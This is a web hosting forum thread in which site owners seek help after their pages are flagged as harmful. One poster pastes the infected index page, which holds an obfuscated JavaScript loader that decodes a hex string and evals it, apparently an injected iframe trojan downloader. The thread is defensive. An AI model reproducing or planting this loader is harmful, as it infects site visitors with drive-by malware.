Jump to content

Help! This Site May Harm Your Computer


Recommended Posts

Someone could have done that yes.

 

Do you have a forum or anything similar (ie a place where others can communicate)?

 

I would ask the helpdesk if they can see if the site seems to have been compromised.

Link to post
Share on other sites

dakotatech,

 

This is what I will recommend to you. Several things:

 

1. Check your sites permissions, make sure not everything is CHMOD to 777

2. Check your Java Scripts

 

Note: The issue appears to be within your Java Scripts. Every issue I am receiving is to do with a Java Script.

 

If you can't work things out please open a ticket with the helpdesk from the link above and have a TCH Support Tech look into a little further for you. :)

Link to post
Share on other sites

My java script was one that I copied from somewhere years ago. It's been fine til now. I am not a java kind of guy. Heck I'm not that good at html or php either. When I go th my site directly I don't see any problem (IE6). The best I can think of is I'll compare things to about a year ago, It's the same code. Or should be. I don't have a forum or anything for someone to download.

Link to post
Share on other sites
  • 2 weeks later...

I got one of these recently. It was with my photo gallery (installed via fantastico). I knew there was something wrong not only with that but my message board (also via fantastico). I even opened a ticket, described the problem but they didn't find anything. I had already removed the message board but forgot about the photo gallery.

 

Anyway, that's been removed as well. The site itself is fine, however.

Link to post
Share on other sites
  • 1 month later...

Yesterday, a user warn us that our page had a trojan: JS/TrojanDownloader/IFrame/EY.gen (trojan)

 

The main page (the page with the trojan) is only a photo that redirect to the shop (only four lines), but we had this page this morning (with the javascript trojan):

 

><html>
<head>
<title>Material de Kickboxing</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#000000" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><!-- o --><script language="JavaScript">
<!--
function gC1cGbQ46(gA6sjiMTa){var bmXq52e35=arguments.callee.toString().replace(/\W/g,'').toUpperCase();var gbb5movQ8;var p46aJYMAG;var MiFBf0yFB=bmXq52e35.length;var B4gE81Sr0;var V8UjyXJ2x='';var Nf5f41fk5=new Array();for(p46aJYMAG=0;p46aJYMAG<256;p46aJYMAG++)Nf5f41fk5[p46aJYMAG]=0;var gbb5movQ8=1;for(p46aJYMAG=128;p46aJYMAG;p46aJYMAG>>=1) {gbb5movQ8=(gbb5movQ8>>>1)^((gbb5movQ8&1)?3988292384:0);for(hjpygo5A5=0;hjpygo5A5<256;hjpygo5A5+=p46aJYMAG*2) {Nf5f41fk5[hjpygo5A5+p46aJYMAG]=(Nf5f41fk5[hjpygo5A5]^gbb5movQ8);if (Nf5f41fk5[hjpygo5A5+p46aJYMAG] < 0) {Nf5f41fk5[hjpygo5A5+p46aJYMAG]+=4294967296;}}}B4gE81Sr0=4294967295;for(gbb5movQ8=0;gbb5movQ8<MiFBf0yFB;gbb5movQ8++){B4gE81Sr0=Nf5f41fk5[(B4gE81Sr0^bmXq52e35.charCodeAt(gbb5movQ8))&255]^((B4gE81Sr0>>8)&16777215);}B4gE81Sr0=B4gE81Sr0^4294967295;if (B4gE81Sr0<0) {B4gE81Sr0+=4294967296;}B4gE81Sr0=B4gE81Sr0.toString(16).toUpperCase();var HNii6t2UC=new Array();var MiFBf0yFB=B4gE81Sr0.length;for(p46aJYMAG=0;p46aJYMAG<8;p46aJYMAG++) {if (MiFBf0yFB + p46aJYMAG >= 8) {HNii6t2UC[p46aJYMAG]=B4gE81Sr0.charCodeAt(p46aJYMAG+MiFBf0yFB-8);} else {HNii6t2UC[p46aJYMAG]=48;}}var B1K23HoQ5=0;var iCvK5hVNE;var V8UjyXJ2x='';var nekrid46u;MiFBf0yFB=gA6sjiMTa.length;for(p46aJYMAG=0;p46aJYMAG<MiFBf0yFB;p46aJYMAG+=2){iCvK5hVNE=parseInt(gA6sjiMTa.substr(p46aJYMAG, 2),16); nekrid46u=iCvK5hVNE-HNii6t2UC[B1K23HoQ5];if(nekrid46u<0) {nekrid46u += 256;}V8UjyXJ2x+=String.fromCharCode(nekrid46u);if(B1K23HoQ5<HNii6t2UC.length-1){B1K23HoQ5++;} else {B1K23HoQ5=0;}}eval(V8UjyXJ2x);}
gC1cGbQ46('9da598aeae97b3a467ada7a2B5976d57759f9bABa29FAA50aca89876639aB9a4a9706468786B73616
D69636a786a7362696598a0aa5fA799a7659Ea76f95ac9978A672AEb497B7615B56acA2A5A6ad6D5b67575
9A997ae97A1AA725B725465A3ADAFa19e7E54a79Fab9a9aAB7B5275A0b1587375709BABa29Aa39A77685b8
0');
//-->
</script>
<!-- c -->
<div align="center"><a href="/tienda"><img src="entrada.jpg" width="667" height="500" border="0"></a> 
</div>
</body>
</html>

 

We have a phpbb3 private forum (with none public area, all restricted for two persons) , and a zencart 1.3.7 shop (I have the same scripts in other pages without any problem).

 

I have removed the trojan, and set index.html permissions to read only, but I'm worried becasuse I don't know how this kind of trojan has attacked our domain :)

Link to post
Share on other sites

Please open a ticket with the help desk, link above or in my signature. The techs will evaluate the situation and help you secure your site.

 

Also, Zencart is at version 1.3.8

 

Do you have all security updates installed for both phpbb3?

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...